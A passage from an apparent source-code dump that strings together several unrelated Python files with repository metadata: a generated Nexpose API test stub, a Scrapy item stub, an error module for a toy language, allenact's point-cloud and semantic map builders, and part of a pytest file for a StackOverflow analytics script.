Adjacent</li><li><code>L</code> = Local</li><li><code>P</code> = Physical</li></ul> | | `cvss-v3-attack-complexity` | <ul><li><code>L</code> = Low</li><li><code>H</code> = High</li></ul> | | `cvss-v3-user-interaction` | <ul><li><code>N</code> = None</li><li><code>R</code> = Required</li></ul> | | `cvss-v3-privileges-required` | <ul><li><code>N</code> = None</li><li><code>L</code> = Low</li><li><code>H</code> = High</li></ul> | | `host-type` | 0=Unknown, 1=Guest, 2=Hypervisor, 3=Physical, 4=Mobile | | `ip-address-type` | 0=IPv4, 1=IPv6 | | `pci-compliance` | 0=fail, 1=pass | | `vulnerability-validated-status` | 0=present, 1=not present | ##### Operator Properties <a section=\"section/Responses/SearchCriteria/OperatorProperties\"></a> The following table outlines which properties are required for each operator and the appropriate data type(s): | Operator | `value` | `lower` | `upper` | | ----------------------|-----------------------|-----------------------|-----------------------| | `are` | `string` | | | | `contains` | `string` | | | | `does-not-contain` | `string` | | | | `ends with` | `string` | | | | `in` | `Array[ string ]` | | | | `in-range` | | `numeric` | `numeric` | | `includes` | `Array[ string ]` | | | | `is` | `string` | | | | `is-applied` | | | | | `is-between` | | `numeric` | `numeric` | | `is-earlier-than` | `numeric` | | | | `is-empty` | | | | | `is-greater-than` | `numeric` | | | | `is-on-or-after` | `string` (yyyy-MM-dd) | | | | `is-on-or-before` | `string` (yyyy-MM-dd) | | | | `is-not` | `string` | | | | `is-not-applied` | | | | | `is-not-empty` | | | | | `is-within-the-last` | `string` | | | | `less-than` | `string` | | | | `like` | `string` | | | | `not-contains` | `string` | | | | `not-in` | `Array[ string ]` | | | | `not-in-range` | | `numeric` | `numeric` | | `not-like` | `string` | | | | `starts-with` | `string` | | | #### Discovery Connection Search Criteria <a section=\"section/Responses/DiscoverySearchCriteria\"></a> Dynamic sites make use of search criteria to match assets from a discovery connection. Search criteria is an array of search filters. Each search filter has a generic format of: ```json { \"field\": \"<field-name>\", \"operator\": \"<operator>\", [\"value\": \"<value>\",] [\"lower\": \"<value>\",] [\"upper\": \"<value>\"] } ``` Every filter defines two required properties `field` and `operator`. The field is the name of an asset property that is being filtered on. The list of supported fields vary depending on the type of discovery connection configured for the dynamic site (e.g vSphere, ActiveSync, etc.). The operator is a type and property-specific operating performed on the filtered property. The valid values for fields outlined in the tables below and are grouped by the type of connection. Every filter also defines one or more values that are supplied to the operator. See <a href=\"#section/Responses/SearchCriteria/OperatorProperties\">Search Criteria Operator Properties</a> for more information on the valid values for each operator. ##### Fields (ActiveSync) This section documents search criteria information for ActiveSync discovery connections. The discovery connections must be one of the following types: `\"activesync-ldap\"`, `\"activesync-office365\"`, or `\"activesync-powershell\"`. The following table outlines the search criteria fields and the available operators for ActiveSync connections: | Field | Operators | | --------------------------------- | ------------------------------------------------------------- | | `last-sync-time` | `is-within-the-last` ` is-earlier-than` | | `operating-system` | `contains` ` does-not-contain` | | `user` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Fields (AWS) This section documents search criteria information for AWS discovery connections. The discovery connections must be the type `\"aws\"`. The following table outlines the search criteria fields and the available operators for AWS connections: | Field | Operators | | ----------------------- | ------------------------------------------------------------- | | `availability-zone` | `contains` ` does-not-contain` | | `guest-os-family` | `contains` ` does-not-contain` | | `instance-id` | `contains` ` does-not-contain` | | `instance-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `instance-state` | `in` ` not-in` | | `instance-type` | `in` ` not-in` | | `ip-address` | `in-range` ` not-in-range` ` is` ` is-not` | | `region` | `in` ` not-in` | | `vpc-id` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Fields (DHCP) This section documents search criteria information for DHCP discovery connections. The discovery connections must be the type `\"dhcp\"`. The following table outlines the search criteria fields and the available operators for DHCP connections: | Field | Operators | | --------------- | ------------------------------------------------------------- | | `host-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `ip-address` | `in-range` ` not-in-range` ` is` ` is-not` | | `mac-address` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Fields (Sonar) This section documents search criteria information for Sonar discovery connections. The discovery connections must be the type `\"sonar\"`. The following table outlines the search criteria fields and the available operators for Sonar connections: | Field | Operators | | ------------------- | -------------------- | | `search-domain` | `contains` ` is` | | `ip-address` | `in-range` ` is` | | `sonar-scan-date` | `is-within-the-last` | ##### Fields (vSphere) This section documents search criteria information for vSphere discovery connections. The discovery connections must be the type `\"vsphere\"`. The following table outlines the search criteria fields and the available operators for vSphere connections: | Field | Operators | | -------------------- | ------------------------------------------------------------------------------------------ | | `cluster` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `data-center` | `is` ` is-not` | | `discovered-time` | `is-on-or-before` ` is-on-or-after` ` is-between` ` is-earlier-than` ` is-within-the-last` | | `guest-os-family` | `contains` ` does-not-contain` | | `host-name` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | | `ip-address` | `in-range` ` not-in-range` ` is` ` is-not` | | `power-state` | `in` ` not-in` | | `resource-pool-path` | `contains` ` does-not-contain` | | `last-time-seen` | `is-on-or-before` ` is-on-or-after` ` is-between` ` is-earlier-than` ` is-within-the-last` | | `vm` | `is` ` is-not` ` contains` ` does-not-contain` ` starts-with` | ##### Enumerated Properties (vSphere) The following fields have enumerated values: | Field | Acceptable Values | | ------------- | ------------------------------------ | | `power-state` | `poweredOn` `poweredOff` `suspended` | ## HATEOAS This API follows Hypermedia as the Engine of Application State (HATEOAS) principals and is therefore hypermedia friendly. Hyperlinks are returned in the `links` property of any given resource and contain a fully-qualified hyperlink to the corresponding resource. The format of the hypermedia link adheres to both the <a target=\"_blank\" href=\"http://jsonapi.org\">{json:api} v1</a> <a target=\"_blank\" href=\"http://jsonapi.org/format/#document-links\">\"Link Object\"</a> and <a target=\"_blank\" href=\"http://json-schema.org/latest/json-schema-hypermedia.html\">JSON Hyper-Schema</a> <a target=\"_blank\" href=\"http://json-schema.org/latest/json-schema-hypermedia.html#rfc.section.5.2\">\"Link Description Object\"</a> formats. For example: ```json \"links\": [{ \"rel\": \"<relation>\", \"href\": \"<href>\" ... }] ``` Where appropriate link objects may also contain additional properties than the `rel` and `href` properties, such as `id`, `type`, etc. See the [Root](#tag/Root) resources for the entry points into API discovery. # noqa: E501
OpenAPI spec version: 3
Contact: support@rapid7.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import nexpose_client
from nexpose_client.models.exception_scope import ExceptionScope # noqa: E501
from nexpose_client.rest import ApiException
class TestExceptionScope(unittest.TestCase):
"""ExceptionScope unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testExceptionScope(self):
"""Test ExceptionScope"""
# FIXME: construct object with mandatory attributes with example values
# model = nexpose_client.models.exception_scope.ExceptionScope() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"root@data-proc.openbase.co.kr"
] | root@data-proc.openbase.co.kr |
86a722adbfb0fe3c0a8f2b9fadf6b3ec83314056 | 52051c450645b30a677a2e5fbff98fcfb64ec517 | /CHTHCrawler/items.py | 005463f8b28ce958f4718a6e88364570d7410942 | [] | no_license | vinhtran1/CHTHCrawler | f5e1a633923f43fde0696a66e7fff884596036e8 | fddbb13a2c93a345e412baaec44dbbac03e46723 | refs/heads/main | 2023-05-10T21:04:58.701847 | 2021-03-04T06:55:36 | 2021-03-04T06:55:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 267 | py | # Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class ChthcrawlerItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
pass
| [
"15521020@gm.uit.edu.vn"
] | 15521020@gm.uit.edu.vn |
e4e6f6234474e6bc047f725e4bbf27761e2dbcc5 | 46d2f9652215e97ce2bf92d97b1dffaa7e44ba18 | /error.py | 483f1559f4eabda6b4e9117d3553fab7ab0220bc | [] | no_license | Breathleas/ToyPL | ed45ea4045fdb69e23938d8e4b572cf4ba57efb8 | f96ae7f6555ec9a55a9726944198c3a896bfac80 | refs/heads/master | 2023-03-30T08:29:37.488471 | 2021-04-07T06:54:14 | 2021-04-07T06:54:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,826 | py | from string_with_arrows import *
class Error(object):
def __init__(self, pos_start, pos_end, error_name, details):
"""
:param pos_start: 错误其实位置
:param pos_end: 错误终止位置
:param error_name: 错误类型名称
:param details: 错误细节
"""
self.pos_start = pos_start
self.pos_end = pos_end
self.error_name = error_name
self.details = details
def as_string(self):
result = f'{self.error_name}: {self.details}'
# 更加细致的错误信息
result += f'File {self.pos_start.fn}, line {self.pos_start.ln + 1}'
# string_with_arrows()方法的效果 => 为了更清晰的标注出报错的位置
# basic > 4 *
# Invalid Syntax: Expected int or floatFile <stdin>, line 1
# 4 *
# ^
result += '\n\n' + string_with_arrows(self.pos_start.ftxt, self.pos_start, self.pos_end)
return result
class IllegalCharError(Error):
def __init__(self, pos_start, pos_end, details):
# Illegal Character => 非法字符
super().__init__(pos_start, pos_end, "Illegal Character", details)
class ExpectedCharError(Error):
def __init__(self, pos_start, pos_end, details):
# Expected Character => 预期字符
super().__init__(pos_start, pos_end, 'Expected Character', details)
class InvalidSyntaxError(Error):
def __init__(self, pos_start, pos_end, details=''):
# Invalid Syntax => 无效的语法
super().__init__(pos_start, pos_end, 'Invalid Syntax', details)
class RTError(Error):
def __init__(self, pos_start, pos_end, detail, context):
super().__init__(pos_start, pos_end, "Runtime Error", detail)
self.context = context
def as_string(self):
result = self.generate_traceback()
result += f'{self.error_name}: {self.details}'
result += '\n\n' + string_with_arrows(self.pos_start.ftxt, self.pos_start, self.pos_end)
return result
def generate_traceback(self):
"""
生成错误栈信息
:return:
"""
result = ''
pos = self.pos_start
ctx = self.context
# 遍历运行时的上下文环境,构建错误栈信息,例如:
# Traceback (most recent call last):
# File <stdin>, line 1, in <program>
# Runtime Error: Division by zero
#
# 1 / 0
# ^
while ctx:
# pos.fn => 报错文件; pos.ln + 1 => 报错行; ctx.display_name => 报错上下文; result => 报错详情
result = f' File {pos.fn}, line {str(pos.ln + 1)}, in {ctx.display_name}\n' + result
pos = ctx.parent_entry_pos
ctx = ctx.parent
return 'Traceback (most recent call last):\n' + result | [
"liaomw@huitouche.com"
] | liaomw@huitouche.com |
695b0730a411e071970885a7c9a14c7fb5b55754 | 444ef2c07e05cf6b2c85ee33535f228d7c5b384e | /allenact/embodiedai/mapping/mapping_utils/map_builders.py | 1d31f53f59e84ca4263e6e57f69e0ff2ca84cf30 | [
"MIT"
] | permissive | zcczhang/allenact | 4d92d771e31868c3e6909c358787b46d2ff995fa | 4657479e8127393f5996e70649da2e2a7eae7332 | refs/heads/main | 2023-08-21T19:30:19.397165 | 2021-10-06T17:33:58 | 2021-10-06T17:33:58 | 396,886,059 | 2 | 0 | NOASSERTION | 2021-08-16T16:52:59 | 2021-08-16T16:52:58 | null | UTF-8 | Python | false | false | 23,116 | py | # MIT License
#
# Original Copyright (c) 2020 Devendra Chaplot
#
# Modified work Copyright (c) 2021 Allen Institute for Artificial Intelligence
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import random
from typing import Optional, Sequence, Union, Dict
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from allenact.embodiedai.mapping.mapping_utils.point_cloud_utils import (
depth_frame_to_world_space_xyz,
project_point_cloud_to_map,
)
class BinnedPointCloudMapBuilder(object):
"""Class used to iteratively construct a map of "free space" based on input
depth maps (i.e. pointclouds).
Adapted from https://github.com/devendrachaplot/Neural-SLAM
This class can be used to (iteratively) construct a metric map of free space in an environment as
an agent moves around. After every step the agent takes, you should call the `update` function and
pass the agent's egocentric depth image along with the agent's new position. This depth map will
be converted into a pointcloud, binned along the up/down axis, and then projected
onto a 3-dimensional tensor of shape (HxWxC) whose where HxW represent the ground plane
and where C equals the number of bins the up-down coordinate was binned into. This 3d map counts the
number of points in each bin. Thus a lack of points within a region can be used to infer that
that region is free space.
# Attributes
fov : FOV of the camera used to produce the depth images given when calling `update`.
vision_range_in_map_units : The maximum distance (in number of rows/columns) that will
be updated when calling `update`, points outside of this map vision range are ignored.
map_size_in_cm : Total map size in cm.
resolution_in_cm : Number of cm per row/column in the map.
height_bins : The bins used to bin the up-down coordinate (for us the y-coordinate). For example,
if `height_bins = [0.1, 1]` then
all y-values < 0.1 will be mapped to 0, all y values in [0.1, 1) will be mapped to 1, and
all y-values >= 1 will be mapped to 2.
**Importantly:** these y-values will first be recentered by the `min_xyz` value passed when
calling `reset(...)`.
device : A `torch.device` on which to run computations. If this device is a GPU you can potentially
obtain significant speed-ups.
"""
def __init__(
self,
fov: float,
vision_range_in_cm: int,
map_size_in_cm: int,
resolution_in_cm: int,
height_bins: Sequence[float],
device: torch.device = torch.device("cpu"),
):
assert vision_range_in_cm % resolution_in_cm == 0
self.fov = fov
self.vision_range_in_map_units = vision_range_in_cm // resolution_in_cm
self.map_size_in_cm = map_size_in_cm
self.resolution_in_cm = resolution_in_cm
self.height_bins = height_bins
self.device = device
self.binned_point_cloud_map = np.zeros(
(
self.map_size_in_cm // self.resolution_in_cm,
self.map_size_in_cm // self.resolution_in_cm,
len(self.height_bins) + 1,
),
dtype=np.float32,
)
self.min_xyz: Optional[np.ndarray] = None
def update(
self,
depth_frame: np.ndarray,
camera_xyz: np.ndarray,
camera_rotation: float,
camera_horizon: float,
) -> Dict[str, np.ndarray]:
"""Updates the map with the input depth frame from the agent.
See the `allenact.embodiedai.mapping.mapping_utils.point_cloud_utils.project_point_cloud_to_map`
function for more information input parameter definitions. **We assume that the input
`depth_frame` has depths recorded in meters**.
# Returns
Let `map_size = self.map_size_in_cm // self.resolution_in_cm`. Returns a dictionary with keys-values:
* `"egocentric_update"` - A tensor of shape
`(vision_range_in_map_units)x(vision_range_in_map_units)x(len(self.height_bins) + 1)` corresponding
to the binned pointcloud after having been centered on the agent and rotated so that
points ahead of the agent correspond to larger row indices and points further to the right of the agent
correspond to larger column indices. Note that by "centered" we mean that one can picture
the agent as being positioned at (0, vision_range_in_map_units/2) and facing downward. Each entry in this tensor
is a count equaling the number of points in the pointcloud that, once binned, fell into this
entry. This is likely the output you want to use if you want to build a model to predict free space from an image.
* `"allocentric_update"` - A `(map_size)x(map_size)x(len(self.height_bins) + 1)` corresponding
to `"egocentric_update"` but rotated to the world-space coordinates. This `allocentric_update`
is what is used to update the internally stored representation of the map.
* `"map"` - A `(map_size)x(map_size)x(len(self.height_bins) + 1)` tensor corresponding
to the sum of all `"allocentric_update"` values since the last `reset()`.
```
"""
with torch.no_grad():
assert self.min_xyz is not None, "Please call `reset` before `update`."
camera_xyz = (
torch.from_numpy(camera_xyz - self.min_xyz).float().to(self.device)
)
depth_frame = torch.from_numpy(depth_frame).to(self.device)
depth_frame[
depth_frame
> self.vision_range_in_map_units * self.resolution_in_cm / 100
] = np.NaN
world_space_point_cloud = depth_frame_to_world_space_xyz(
depth_frame=depth_frame,
camera_world_xyz=camera_xyz,
rotation=camera_rotation,
horizon=camera_horizon,
fov=self.fov,
)
world_binned_map_update = project_point_cloud_to_map(
xyz_points=world_space_point_cloud,
bin_axis="y",
bins=self.height_bins,
map_size=self.binned_point_cloud_map.shape[0],
resolution_in_cm=self.resolution_in_cm,
flip_row_col=True,
)
# Center the cloud on the agent
recentered_point_cloud = world_space_point_cloud - (
torch.FloatTensor([1.0, 0.0, 1.0]).to(self.device) * camera_xyz
).reshape((1, 1, 3))
# Rotate the cloud so that positive-z is the direction the agent is looking
theta = (
np.pi * camera_rotation / 180
) # No negative since THOR rotations are already backwards
cos_theta = np.cos(theta)
sin_theta = np.sin(theta)
rotation_transform = torch.FloatTensor(
[
[cos_theta, 0, -sin_theta],
[0, 1, 0], # unchanged
[sin_theta, 0, cos_theta],
]
).to(self.device)
rotated_point_cloud = recentered_point_cloud @ rotation_transform.T
xoffset = (self.map_size_in_cm / 100) / 2
agent_centric_point_cloud = rotated_point_cloud + torch.FloatTensor(
[xoffset, 0, 0]
).to(self.device)
allocentric_update_numpy = world_binned_map_update.cpu().numpy()
self.binned_point_cloud_map = (
self.binned_point_cloud_map + allocentric_update_numpy
)
agent_centric_binned_map = project_point_cloud_to_map(
xyz_points=agent_centric_point_cloud,
bin_axis="y",
bins=self.height_bins,
map_size=self.binned_point_cloud_map.shape[0],
resolution_in_cm=self.resolution_in_cm,
flip_row_col=True,
)
vr = self.vision_range_in_map_units
vr_div_2 = self.vision_range_in_map_units // 2
width_div_2 = agent_centric_binned_map.shape[1] // 2
agent_centric_binned_map = agent_centric_binned_map[
:vr, (width_div_2 - vr_div_2) : (width_div_2 + vr_div_2), :
]
return {
"egocentric_update": agent_centric_binned_map.cpu().numpy(),
"allocentric_update": allocentric_update_numpy,
"map": self.binned_point_cloud_map,
}
def reset(self, min_xyz: np.ndarray):
"""Reset the map.
Resets the internally stored map.
# Parameters
min_xyz : An array of size (3,) corresponding to the minimum possible x, y, and z values that will be observed
as a point in a pointcloud when calling `.update(...)`. The (world-space) maps returned by calls to `update`
will have been normalized so the (0,0,:) entry corresponds to these minimum values.
"""
self.min_xyz = min_xyz
self.binned_point_cloud_map = np.zeros_like(self.binned_point_cloud_map)
class ObjectHull2d:
def __init__(
self,
object_id: str,
object_type: str,
hull_points: Union[np.ndarray, Sequence[Sequence[float]]],
):
"""A class used to represent 2d convex hulls of objects when projected
to the ground plane.
# Parameters
object_id : A unique id for the object.
object_type : The type of the object.
hull_points : A Nx2 matrix with `hull_points[:, 0]` being the x coordinates and `hull_points[:, 1]` being
the `z` coordinates (this is using the Unity game engine conventions where the `y` axis is up/down).
"""
self.object_id = object_id
self.object_type = object_type
self.hull_points = (
hull_points
if isinstance(hull_points, np.ndarray)
else np.array(hull_points)
)
class SemanticMapBuilder(object):
"""Class used to iteratively construct a semantic map based on input depth
maps (i.e. pointclouds).
Adapted from https://github.com/devendrachaplot/Neural-SLAM
This class can be used to (iteratively) construct a semantic map of objects in the environment.
This map is similar to that generated by `BinnedPointCloudMapBuilder` (see its documentation for
more information) but the various channels correspond to different object types. Thus
if the `(i,j,k)` entry of a map generated by this function is `True`, this means that an
object of type `k` is present in position `i,j` in the map. In particular, by "present" we mean that,
after projecting the object to the ground plane and taking the convex hull of the resulting
2d object, a non-trivial portion of this convex hull overlaps the `i,j` position.
For attribute information, see the documentation of the `BinnedPointCloudMapBuilder` class. The
only attribute present in this class that is not present in `BinnedPointCloudMapBuilder` is
`ordered_object_types` which corresponds to a list of unique object types where
object type `ordered_object_types[i]` will correspond to the `i`th channel of the map
generated by this class.
"""
def __init__(
self,
fov: float,
vision_range_in_cm: int,
map_size_in_cm: int,
resolution_in_cm: int,
ordered_object_types: Sequence[str],
device: torch.device = torch.device("cpu"),
):
self.fov = fov
self.vision_range_in_map_units = vision_range_in_cm // resolution_in_cm
self.map_size_in_cm = map_size_in_cm
self.resolution_in_cm = resolution_in_cm
self.ordered_object_types = tuple(ordered_object_types)
self.device = device
self.object_type_to_index = {
ot: i for i, ot in enumerate(self.ordered_object_types)
}
self.ground_truth_semantic_map = np.zeros(
(
self.map_size_in_cm // self.resolution_in_cm,
self.map_size_in_cm // self.resolution_in_cm,
len(self.ordered_object_types),
),
dtype=np.uint8,
)
self.explored_mask = np.zeros(
(
self.map_size_in_cm // self.resolution_in_cm,
self.map_size_in_cm // self.resolution_in_cm,
1,
),
dtype=bool,
)
self.min_xyz: Optional[np.ndarray] = None
@staticmethod
def randomly_color_semantic_map(
map: Union[np.ndarray, torch.Tensor], threshold: float = 0.5, seed: int = 1
) -> np.ndarray:
if not isinstance(map, np.ndarray):
map = np.array(map)
rnd = random.Random(seed)
semantic_int_mat = (
(map >= threshold)
* np.array(list(range(1, map.shape[-1] + 1))).reshape((1, 1, -1))
).max(-1)
# noinspection PyTypeChecker
return np.uint8(
np.array(
[(0, 0, 0)]
+ [
tuple(rnd.randint(0, 256) for _ in range(3))
for _ in range(map.shape[-1])
]
)[semantic_int_mat]
)
def _xzs_to_colrows(self, xzs: np.ndarray):
height, width, _ = self.ground_truth_semantic_map.shape
return np.clip(
np.int32(
(
(100 / self.resolution_in_cm)
* (xzs - np.array([[self.min_xyz[0], self.min_xyz[2]]]))
)
),
a_min=0,
a_max=np.array(
[width - 1, height - 1]
), # width then height as we're returns cols then rows
)
def build_ground_truth_map(self, object_hulls: Sequence[ObjectHull2d]):
self.ground_truth_semantic_map.fill(0)
height, width, _ = self.ground_truth_semantic_map.shape
for object_hull in object_hulls:
ot = object_hull.object_type
if ot in self.object_type_to_index:
ind = self.object_type_to_index[ot]
self.ground_truth_semantic_map[
:, :, ind : (ind + 1)
] = cv2.fillConvexPoly(
img=np.array(
self.ground_truth_semantic_map[:, :, ind : (ind + 1)],
dtype=np.uint8,
),
points=self._xzs_to_colrows(np.array(object_hull.hull_points)),
color=255,
)
def update(
self,
depth_frame: np.ndarray,
camera_xyz: np.ndarray,
camera_rotation: float,
camera_horizon: float,
) -> Dict[str, np.ndarray]:
"""Updates the map with the input depth frame from the agent.
See the documentation for `BinnedPointCloudMapBuilder.update`,
the inputs and outputs are similar except that channels are used
to represent the presence/absence of objects of given types.
Unlike `BinnedPointCloudMapBuilder.update`, this function also
returns two masks with keys `"egocentric_mask"` and `"mask"`
that can be used to determine what portions of the map have been
observed by the agent so far in the egocentric and world-space
reference frames respectively.
"""
with torch.no_grad():
assert self.min_xyz is not None
camera_xyz = torch.from_numpy(camera_xyz - self.min_xyz).to(self.device)
map_size = self.ground_truth_semantic_map.shape[0]
depth_frame = torch.from_numpy(depth_frame).to(self.device)
depth_frame[
depth_frame
> self.vision_range_in_map_units * self.resolution_in_cm / 100
] = np.NaN
world_space_point_cloud = depth_frame_to_world_space_xyz(
depth_frame=depth_frame,
camera_world_xyz=camera_xyz,
rotation=camera_rotation,
horizon=camera_horizon,
fov=self.fov,
)
world_newly_explored = (
project_point_cloud_to_map(
xyz_points=world_space_point_cloud,
bin_axis="y",
bins=[],
map_size=map_size,
resolution_in_cm=self.resolution_in_cm,
flip_row_col=True,
)
> 0.001
)
world_update_and_mask = torch.cat(
(
torch.logical_and(
torch.from_numpy(self.ground_truth_semantic_map).to(
self.device
),
world_newly_explored,
),
world_newly_explored,
),
dim=-1,
).float()
world_update_and_mask_for_sample = world_update_and_mask.unsqueeze(
0
).permute(0, 3, 1, 2)
# We now use grid sampling to rotate world_update_for_sample into the egocentric coordinate
# frame of the agent so that the agent's forward direction is downwards in the tensor
# (and it's right side is to the right in the image, this means that right/left
# when taking the perspective of the agent in the image). This convention aligns with
# what's expected by grid_sample where +x corresponds to +cols and +z corresponds to +rows.
# Here also the rows/cols have been normalized so that the center of the image is at (0,0)
# and the bottom right is at (1,1).
# Mentally you can think of the output from the F.affine_grid function as you wanting
# rotating/translating an axis-aligned square on the image-to-be-sampled and then
# copying whatever is in this square to a new image. Note that the translation always
# happens in the global reference frame after the rotation. We'll start by rotating
# the square so that the the agent's z direction is downwards in the image.
# Since the global axis of the map and the grid sampling are aligned, this requires
# rotating the square by the rotation of the agent. As rotation is negative the usual
# standard in THOR, we need to negate the rotation of the agent.
theta = -np.pi * camera_rotation / 180
# Here form the rotation matrix
cos_theta = np.cos(theta)
sin_theta = np.sin(theta)
rot_mat = torch.FloatTensor(
[[cos_theta, -sin_theta], [sin_theta, cos_theta]]
).to(self.device)
# Now we need to figure out the translation. For an intuitive understanding, we break this
# translation into two different "offsets". The first offset centers the square on the
# agent's current location:
scaler = 2 * (100 / (self.resolution_in_cm * map_size))
offset_to_center_the_agent = (
scaler
* torch.FloatTensor([camera_xyz[0], camera_xyz[2]])
.unsqueeze(-1)
.to(self.device)
- 1
)
# The second offset moves the square in the direction of the agent's z direction
# so that the output image will have the agent's view starting directly at the
# top of the image.
offset_to_top_of_image = rot_mat @ torch.FloatTensor([0, 1.0]).unsqueeze(
1
).to(self.device)
rotation_and_translate_mat = torch.cat(
(rot_mat, offset_to_top_of_image + offset_to_center_the_agent,), dim=1,
)
ego_update_and_mask = F.grid_sample(
world_update_and_mask_for_sample.to(self.device),
F.affine_grid(
rotation_and_translate_mat.to(self.device).unsqueeze(0),
world_update_and_mask_for_sample.shape,
align_corners=False,
),
align_corners=False,
)
# All that's left now is to crop out the portion of the transformed tensor that we actually
# care about (i.e. the portion corresponding to the agent's `self.vision_range_in_map_units`.
vr = self.vision_range_in_map_units
half_vr = vr // 2
center = self.map_size_in_cm // (2 * self.resolution_in_cm)
cropped = ego_update_and_mask[
:, :, :vr, (center - half_vr) : (center + half_vr)
]
np.logical_or(
self.explored_mask,
world_newly_explored.cpu().numpy(),
out=self.explored_mask,
)
return {
"egocentric_update": cropped[0, :-1].permute(1, 2, 0).cpu().numpy(),
"egocentric_mask": (cropped[0, -1:].view(vr, vr, 1) > 0.001)
.cpu()
.numpy(),
"explored_mask": np.array(self.explored_mask),
"map": np.logical_and(
self.explored_mask, (self.ground_truth_semantic_map > 0)
),
}
def reset(self, min_xyz: np.ndarray, object_hulls: Sequence[ObjectHull2d]):
"""Reset the map.
Resets the internally stored map.
# Parameters
min_xyz : An array of size (3,) corresponding to the minimum possible x, y, and z values that will be observed
as a point in a pointcloud when calling `.update(...)`. The (world-space) maps returned by calls to `update`
will have been normalized so the (0,0,:) entry corresponds to these minimum values.
object_hulls : The object hulls corresponding to objects in the scene. These will be used to
construct the map.
"""
self.min_xyz = min_xyz
self.build_ground_truth_map(object_hulls=object_hulls)
| [
"lucaw@allenai.org"
] | lucaw@allenai.org |
da3e29610a1aa1a80ddc22bf6047915f966e07d3 | 3e60df8580f3dd1f11a00856fbb1ccc974f3e2d9 | /HW2/test_stackoverflow_analytics.py | 8cbc7d1708e375e8b173d6720091d025bb07f7b5 | [] | no_license | StepDan23/MADE_python_for_prodaction | 96148db4a3784655bfcb76aa1eb1151b5598538a | a7166e504c9aceef3253aeb49317d257b4aae953 | refs/heads/master | 2023-02-27T08:37:57.893047 | 2021-02-01T15:24:49 | 2021-02-01T15:24:49 | 333,349,117 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,592 | py | from argparse import ArgumentParser
import pytest
from unittest.mock import patch
from stackoverflow_analytics import WordStatistic, setup_parser
NOT_EXIST_FILEPATH = 'not_exist_filepath'
def total_size_of_dict_of_dict(dictionary):
all_keys = set()
for inner_dict in dictionary.values():
all_keys.update(inner_dict.keys())
return len(all_keys)
def test_setup_parser_show_help_empty_args():
parser = ArgumentParser()
with patch('sys.argv', ['']):
with pytest.raises(SystemExit):
setup_parser(parser)
def test_parse_args_raise_file_not_exist():
parser = ArgumentParser()
setup_parser(parser)
sys_args = [f'--questions', NOT_EXIST_FILEPATH,
f'--stop-words', NOT_EXIST_FILEPATH,
f'--queries', NOT_EXIST_FILEPATH]
with patch('sys.argv', [''] + sys_args):
with pytest.raises(SystemExit):
parser.parse_args()
@pytest.mark.parametrize('data, expected_len', [
('word are are', 2),
('word are', 2),
('', 0),
])
def test_load_stop_words(data, expected_len):
statistic = WordStatistic()
statistic.load_stop_words(data.split())
cur_len = len(statistic.stop_words)
assert expected_len == cur_len
@pytest.mark.parametrize('data, expected_len', [
(['<row PostTypeId="1" CreationDate="2010-11-15T20:09:58.970" Score="1" Title="SQL Server" />'], 1),
(['<row PostTypeId="1" CreationDate="2010-11-15T20:09:58.970" Score="1" Title="SQL Server" />',
'<row PostTypeId="2" CreationDate="2010-11-15T20:09:58.970" Score="1" Title="SQL Server" />'], 1),
(['<row PostTypeId="1" CreationDate="some_year" Score="1" Title="SQL Server" />'], 0),
([' PostTypeId="1" CreationDate="2010-11-15T20:09:58.970" Score="1" Title="SQL Server" />'], 0),
(['<row PostTypeId="1" CreationDate="2010-11-15T20:09:58.970" Title="SQL Server" />'], 0),
(['<row PostTypeId="1" CreationDate="2010-11-15T20:09:58.970" Score="1" Title="SQL Server"'], 0),
(['<row PostTypeId="1" CreationDate="time" Score="1" Title="SQL Server'], 0),
])
def test_parse_documents_validation(data, expected_len):
statistic = WordStatistic()
cur_len = len(statistic.parse_documents(data))
assert expected_len == cur_len
@pytest.mark.parametrize('doc_info, expected_year_len, expected_words_len', [
([(1999, -2, 'word $word are'),
(1999, -2, 'another word,word')], 1, 3),
([(1999, -2, 'word wOrd woRd'),
(2000, -2, 'Word word $word')], 2, 1),
])
def test_add_new_document(doc_info, expected_year_len, expected_words_len):
statistic = WordStatistic()
for doc_year, doc_score, doc_text in doc_info:
statistic.add_new_document_to_statistic(doc_year, doc_score, doc_text)
assert expected_year_len == len(statistic.words_statistic)
words_count = total_size_of_dict_of_dict(statistic.words_statistic)
assert expected_words_len == words_count
@pytest.mark.parametrize('doc_year, doc_score, doc_text, expected_total_score', [
(1999, 10, 'word $word are', 20),
(1999, 10, 'word $word word', 10),
